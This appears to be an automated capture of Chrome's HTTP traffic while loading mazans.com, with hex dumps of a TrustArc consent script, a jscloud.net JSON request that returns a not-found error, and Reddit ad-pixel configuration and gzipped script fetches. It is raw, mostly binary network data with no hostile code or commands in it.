                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC15855INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 74 72 75 73 74 65 5f 65 75 28 29 7b 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 76 61 72 20 67 3d 74 72 75 73 74 65 2e 65 75 2e 62 69 6e 64 4d 61 70 3b 67 2e 66 65 61 74 2e 69 73 43 6f 6e 73 65 6e 74 52 65 74 72 69 65 76 65 64 3d 67 2e 66 65 61 74 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 3f 67 2e 66 65 61 74 2e 69 73 43 6f 6e 73 65 6e 74 52 65 74 72 69 65 76 65 64 3a 21 30 3b 69 66 28 21 75 2e 64 6f 6e 65 26 26 74 72 75 73 74 65 2e 75 74 69 6c 2e 69 73 43 6f 6e 73 65 6e 74 52 65 73 6f 6c 76 65 64 28 29 29 7b 75 2e 64 6f 6e 65 3d 21 30 3b 76 61 72 20 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 2c 63 3d 74 72 75 73 74 65 2e 75 74 69 6c 2e 72 65 61 64 43 6f 6f 6b 69
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: function _truste_eu(){function u(){var g=truste.eu.bindMap;g.feat.isConsentRetrieved=g.feat.crossDomain?g.feat.isConsentRetrieved:!0;if(!u.done&&truste.util.isConsentResolved()){u.done=!0;var k=function(){var a=(new Date).getTime(),c=truste.util.readCooki
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC16384INData Raw: 43 6f 6f 6b 69 65 28 61 2c 64 29 3b 63 3d 64 7d 72 65 74 75 72 6e 20 63 7d 3b 74 72 75 73 74 65 2e 75 74 69 6c 2e 73 61 6d 65 73 69 74 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 76 61 72 20 62 3b 0a 62 3d 28 62 3d 52 65 67 45 78 70 28 22 55 43 42 72 6f 77 73 65 72 5b 2f 5d 22 2c 22 69 67 22 29 2e 65 78 65 63 28 61 29 29 26 26 62 2e 6c 65 6e 67 74 68 3f 21 30 3a 21 31 3b 69 66 28 62 29 7b 76 61 72 20 63 3d 52 65 67 45 78 70 28 22 55 43 42 72 6f 77 73 65 72 5b 2f 5d 28 5c 5c 64 2b 29 5b 2e 5d 28 5c 5c 64 2b 29 5b 2e 5d 28 5c 5c 64 2b 29 5b 2e 5c 5c 64 5d 2a 20 22 2c 22 69 67 22 29 2e 65 78 65 63 28 61 29 3b 63 26 26 34 3d 3d 3d 63 2e 6c 65 6e 67 74 68 3f 28 61 3d 2b 63 5b 31 5d 2c 62 3d 2b 63 5b 32 5d 2c 63 3d 2b 63
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: Cookie(a,d);c=d}return c};truste.util.samesite=function(a){function b(a){var b;b=(b=RegExp("UCBrowser[/]","ig").exec(a))&&b.length?!0:!1;if(b){var c=RegExp("UCBrowser[/](\\d+)[.](\\d+)[.](\\d+)[.\\d]* ","ig").exec(a);c&&4===c.length?(a=+c[1],b=+c[2],c=+c
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC16384INData Raw: 63 65 29 3a 74 72 75 73 74 65 2e 65 75 2e 63 70 72 61 2e 64 72 6f 70 43 70 72 61 43 6f 6f 6b 69 65 28 21 31 29 2c 74 72 75 73 74 65 2e 65 75 2e 68 69 64 65 43 6c 6f 73 65 42 75 74 74 6f 6e 28 21 31 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 68 69 64 65 5f 63 6c 6f 73 65 5f 62 75 74 74 6f 6e 22 3a 74 72 75 73 74 65 2e 65 75 2e 68 69 64 65 43 6c 6f 73 65 42 75 74 74 6f 6e 28 21 30 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 66 69 6e 69 73 68 65 64 5f 6f 70 74 5f 6f 75 74 22 3a 74 72 75 73 74 65 2e 75 74 69 6c 2e 74 72 61 63 65 28 22 61 75 74 6f 20 6f 70 74 20 6f 75 74 20 70 72 6f 63 65 73 73 20 66 69 6e 69 73 68 65 64 22 29 3b 74 72 75 73 74 65 2e 65 75 2e 6f 70 74 4f 75 74 44 6f 6e 65 3d 0a 21 30 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 74 72 75 73 74 65 2d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ce):truste.eu.cpra.dropCpraCookie(!1),truste.eu.hideCloseButton(!1));break;case "hide_close_button":truste.eu.hideCloseButton(!0);break;case "finished_opt_out":truste.util.trace("auto opt out process finished");truste.eu.optOutDone=!0;break;case "truste-
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC16384INData Raw: 2c 70 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 72 29 2c 70 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 29 29 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 62 3d 73 65 6c 66 2e 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 6f 62 6a 65 63 74 22 29 2c 68 3d 62 2e 6c 65 6e 67 74 68 3b 30 3c 68 2d 2d 3b 29 7b 76 61 72 20 6e 3d 62 5b 68 5d 3b 6e 26 26 28 6e 2e 63 6c 61 73 73 4e 61 6d 65 2b 3d 22 20 74 72 75 73 74 65 5f 68 69 64 64 65 6e 22 29 7d 7d 63 61 74 63 68 28 71 29 7b 7d 74 72 75 73 74 65 2e 65 75 2e 61 64 64 43 6c 6f 73 65 42 75 74 74 6f 6e 28 61 2c 22 69 72 6d 22 29 3b 74 72 75 73 74 65 2e 75 74 69 6c 2e 61 64 64 4c 69 73 74 65 6e 65 72 28 73 65 6c 66 2e 64 6f 63 75 6d 65 6e 74 2c 22 66 6f 63 75 73 22 2c 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ,p.appendChild(r),p.appendChild(c));try{for(var b=self.document.getElementsByTagName("object"),h=b.length;0<h--;){var n=b[h];n&&(n.className+=" truste_hidden")}}catch(q){}truste.eu.addCloseButton(a,"irm");truste.util.addListener(self.document,"focus",func
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC16384INData Raw: 6c 61 6e 67 75 61 67 65 29 3b 74 72 75 73 74 65 2e 75 74 69 6c 2e 61 64 64 4c 69 73 74 65 6e 65 72 28 62 2c 22 6b 65 79 64 6f 77 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 7c 7c 28 61 3d 77 69 6e 64 6f 77 2e 65 76 65 6e 74 29 3b 76 61 72 20 63 3d 61 2e 77 68 69 63 68 7c 7c 61 2e 6b 65 79 43 6f 64 65 3b 69 66 28 31 33 3d 3d 63 7c 7c 33 32 3d 3d 0a 63 29 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 3f 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3a 65 76 65 6e 74 2e 72 65 74 75 72 6e 56 61 6c 75 65 3d 21 31 2c 62 2e 63 6c 69 63 6b 28 29 7d 29 3b 62 2e 73 74 79 6c 65 2e 63 75 72 73 6f 72 3d 22 70 6f 69 6e 74 65 72 22 3b 62 2e 69 6e 6e 65 72 48 54 4d 4c 3d 61 2e 63 63 70 61 54 65 78 74 3b 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: language);truste.util.addListener(b,"keydown",function(a){a||(a=window.event);var c=a.which||a.keyCode;if(13==c||32==c)a.preventDefault?a.preventDefault():event.returnValue=!1,b.click()});b.style.cursor="pointer";b.innerHTML=a.ccpaText;var c=document.get
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC15592INData Raw: 73 20 6f 72 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 22 7d 3b 74 68 69 73 2e 74 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 44 6f 69 6e 67 20 41 50 49 20 43 61 6c 6c 22 2c 41 72 72 61 79 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 29 3b 73 77 69 74 63 68 28 61 29 7b 63 61 73 65 20 22 67 65 74 43 6f 6e 73 65 6e 74 22 3a 76 61 72 20 64 3d 28 61 72 67 75 6d 65 6e 74 73 5b 32 5d 7c 7c 63 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 29 2e 72 65 70 6c 61 63 65 28 2f 5e 5c 2e 3f 2f 2c 22 2e 22 29 2c 65 3d 74 68 69 73 2e 67 65 74 41 75 74 68 6f 72 69 74 79 4c 65 76 65 6c 28 64 2c 28 74 68 69 73 2e 63 61 64 64 79 7c 7c 7b 7d 29 2e 66 72 6f 6d 2c 62 2c 61 72 67 75 6d 65 6e 74 73 5b 33 5d 29 3b 69 66 28 22 61 6c 6c 22 3d 3d 64 29 72 65 74 75 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: s or not allowed"};this.tconsole.log("Doing API Call",Array.apply(null,arguments));switch(a){case "getConsent":var d=(arguments[2]||c.location.hostname).replace(/^\.?/,"."),e=this.getAuthorityLevel(d,(this.caddy||{}).from,b,arguments[3]);if("all"==d)retur


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          53192.168.2.1749864104.26.5.394436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC600OUTGET /x/45414/httpsmazanscomWEBID6672849687924zerobotemailEMAIL_REDACTED.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: jscloud.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC823INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:15 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          last-modified: Thu, 16 Jan 2020 10:42:21 GMT
                                                                                                                                                                                                                                                                                                                                                                          vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nim4C9pGG6a6JYUm2avSvhtYmPV0mRnTp4IXGDZaloyu1vuHiyVvBFVs3ZXo0cdR68dKA2EAXLVaMQZQuGlUxO%2B3FcC4yZJK8ZZsL01tKxMQ5w8ejBUUgiJWskmw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                          CF-RAY: 8e2023ba9912e5bd-DFW
                                                                                                                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1212&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1178&delivery_rate=2551541&cwnd=237&unsent_bytes=0&cid=86b3ee4bcf8dfb6c&ts=317&x=0"
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC32INData Raw: 31 61 0d 0a 7b 22 65 72 72 6f 72 22 3a 22 46 49 4c 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 7d 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 1a{"error":"FILE_NOT_FOUND"}
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          54192.168.2.1749867151.101.129.1404436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC597OUTGET /ads/conversions-config/v1/pixel/config/t2_i1au5p4_telemetry HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.redditstatic.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC868INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 86
                                                                                                                                                                                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                          cache-control: max-age=300
                                                                                                                                                                                                                                                                                                                                                                          content-type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:15 GMT
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding,Origin
                                                                                                                                                                                                                                                                                                                                                                          Server: snooserv
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
                                                                                                                                                                                                                                                                                                                                                                          NEL: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 0.02, "failure_fraction": 0.02}
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC86INData Raw: 7b 22 76 65 72 73 69 6f 6e 5f 68 61 73 68 22 3a 22 34 39 32 36 37 62 63 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 64 64 69 74 73 74 61 74 69 63 2e 63 6f 6d 2f 61 64 73 2f 34 39 32 36 37 62 63 65 2f 70 69 78 65 6c 2e 6a 73 22 7d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: {"version_hash":"49267bce","url":"https://www.redditstatic.com/ads/49267bce/pixel.js"}


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          55192.168.2.1749869151.101.129.1404436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC565OUTGET /pixels/t2_i1au5p4/config HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: pixel-config.reddit.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC253INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 27
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:15 GMT
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC27INData Raw: 1f 8b 08 00 00 00 00 00 00 ff aa ae e5 02 04 00 00 ff ff 06 b0 a1 dd 03 00 00 00
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          56192.168.2.1749868151.101.193.1404436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC356OUTGET /ads/pixel.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.redditstatic.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 12126
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 15 Oct 2024 19:34:59 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "5e9ac3a42b557bf8ca38cf2e8baba70b"
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=60
                                                                                                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:15 GMT
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding,Origin
                                                                                                                                                                                                                                                                                                                                                                          Server: snooserv
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
                                                                                                                                                                                                                                                                                                                                                                          NEL: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 0.02, "failure_fraction": 0.02}
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC1378INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d4 3b 6b 73 da c8 96 7f 05 ab 6e b8 92 69 cb 80 b1 93 08 6b 5c 04 e4 98 89 8d bd 3c 9c 4c b9 18 4a 96 1a 50 22 24 46 12 71 bc 86 fd ed 7b fa 25 b5 04 b6 93 3b 3b 1f 36 95 42 dd 7d 4e 9f 77 9f 3e dd 92 f7 a6 ab c0 49 bc 30 28 45 2a 46 01 4a b4 a7 74 24 54 3d 34 d5 9e bc a9 ba 17 dc 79 63 d6 c2 b4 f5 dd 8e 4a 8e a9 08 54 c5 34 93 c7 25 0e a7 a5 08 ff b5 f2 22 5c 2e f3 46 93 cc 99 96 cb 8e 16 e1 64 15 05 25 07 88 ee 55 35 32 be 12 63 2b 3e 46 a8 da 66 80 1f 4a 56 14 85 91 aa b4 ed 20 08 93 d2 d4 0b dc d2 22 74 57 3e 2e fd 5b a9 78 15 e5 df 8a d6 4c e6 51 f8 50 b2 75 27 74 b1 a9 5c 5d 77 46 97 d6 a4 77 3d 9c 9c 5f 8f 7a 1d 05 d9 1b 42 6f 69 12 d9 cd 27 fc 63 19 46 49 6c 3c 6d 36 4d a2 c3 5d 75 ac 3b b6 ef ab 4b 9d 83 90 d0 46 8d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ;ksnik\<LJP"$Fq{%;;6B}Nw>I0(E*FJt$T=4ycJT4%"\.Fd%U52c+>FfJV "tW>.[xLQPu't\]wFw=_zBoi'cFIl<m6M]u;KF
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC1378INData Raw: 35 f4 02 55 21 55 c8 12 ba 52 28 00 06 cc cb 94 67 fd 4b 16 4d ac c3 63 0b 15 bc 28 63 12 5f d6 b5 4c bb 23 58 a4 94 11 f1 20 a7 02 9b 27 d8 1f ce 82 75 0d 81 8c 74 ed 7a 6f de ed 37 5e f5 af cc e9 b0 4e 72 fd 25 54 64 41 8d bb 96 77 fe 31 ef fa 94 fe df 77 b0 44 87 39 8f 39 4c 9f 46 e1 82 8c b6 61 1b a0 6e cf fc 27 4f 79 d6 85 0c 29 e7 c5 74 88 3b 32 ed 3f e3 cb 02 3e 55 4a 56 65 6d aa a0 41 39 23 e3 70 79 5b 89 ea 69 c2 97 a0 e8 ab be 2c 70 22 ce 1c 25 d3 77 dc 95 b4 f9 8a 23 a5 d2 de c5 64 eb 1c f5 bb ed 70 b1 84 4c 04 c1 86 63 c7 5e 62 95 c5 84 b4 9b 66 04 b4 b4 dc 07 5a c5 52 ff ca f6 c1 86 0b a8 e6 47 c3 f3 83 77 25 d7 4e 6c 85 08 59 b0 f9 0a 04 a5 16 e7 92 70 7e 14 4b 5d 05 5c 0a b6 b5 e7 e4 13 13 35 42 f4 c3 6a 3a c5 11 76 3f f8 a1 f3 ad e5 cf c2
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 5U!UR(gKMc(c_L#X 'utzo7^Nr%TdAw1wD99LFan'Oy)t;2?>UJVemA9#py[i,p"%w#dpLc^bfZRGw%NlYp~K]\5Bj:v?
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC1378INData Raw: 3e a6 01 51 71 68 ef 68 4c e3 a2 e2 d2 5e 63 4c c3 a3 82 69 ef 78 4c a3 a4 32 a5 bd 93 31 0d 96 ca 8c f6 de 8e 69 cc 54 e6 eb 2a 0d d7 f3 ad 7a 88 65 bb 9f 3a d5 04 64 09 0e c3 c4 f6 cd 77 fb c5 63 15 83 5e e2 69 02 c0 5c 81 2d 6a 81 94 e6 5d 8a 0a 46 3d 86 93 7d ad fe 8e 9e df d3 f1 37 47 f5 4c 84 bb 5a a3 a2 a6 a0 ca 49 03 66 bd 3f 3d 6d 68 63 96 19 a7 7e 08 8b 2c 13 ee 30 4b 5e 9a 4c e5 f8 39 2a d9 d4 fc c9 c0 6c ec 67 27 09 7e 6b b1 ab cc 64 ab fa c5 43 00 cf 3b af 1c 03 68 d2 91 f2 44 fe 18 00 55 56 bb 90 c7 72 a5 a6 ca 60 a4 2c 23 f5 e0 6e cc b4 50 14 d8 bc 60 43 69 9d c0 c6 ff 3f 96 09 c7 3f 51 26 28 ab 18 97 c8 c5 02 68 46 f7 0a cf 45 ed eb de 60 d8 ea 0d 07 66 4e 76 fa 12 2c 89 15 72 e1 49 2c 26 43 d9 08 80 c8 1b 64 18 c6 71 42 77 8b 2f 57 97 17
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: >QqhhL^cLixL21iT*ze:dwc^i\-j]F=}7GLZIf?=mhc~,0K^L9*lg'~kdC;hDUVr`,#nP`Ci??Q&(hFE`fNv,rI,&CdqBw/W
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC1378INData Raw: 86 7f dc 58 06 db 6c 21 57 92 87 82 a8 6c f0 03 8c 05 da c0 ba b4 da c3 eb 1c fe a4 3d 18 f0 39 a4 a9 f0 6d 6b 68 7d 19 8a 61 d2 a6 f4 08 df 61 ab db 1b 50 c2 69 8f c1 ac 2f b0 b0 19 80 36 81 6f 1a f1 40 00 b2 54 c6 19 b6 2c 0b 16 2a 7d 90 8d 85 89 05 69 9f b7 e4 b9 45 a1 89 b8 29 90 4a cc 64 4d c7 a8 b8 1b f2 8f 7e b8 fc f6 3f 39 25 bc 7a 44 80 ea eb bf 56 38 7a 84 34 0a eb 3f c9 9f 16 fe 22 10 f1 19 9a be 85 8a 58 6d 1c cb 53 f8 10 50 26 1b fc f7 86 0c a3 5b be 86 6c 58 b8 de 02 2a 42 28 59 60 35 d3 d4 9d 95 8c 04 29 fd c0 8b 1c 4d 3a e4 ed 05 61 4e 26 a9 5a 45 d1 95 0a 41 da 34 b9 da fa 4e 82 bb 06 85 a1 c8 3d 1a b9 9f 1b 01 99 73 f2 09 01 85 de d6 33 29 1c 36 42 b2 18 ff 56 73 e9 7b 89 29 0d d3 57 74 50 3e eb 4a 7a 1a a6 23 fc c0 7d 5a 3f 93 90 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: Xl!Wl=9mkh}aaPi/6o@T,*}iE)JdM~?9%zDV8z4?"XmSP&[lX*B(Y`5)M:aN&ZEA4N=s3)6BVs{)WtP>Jz#}Z?
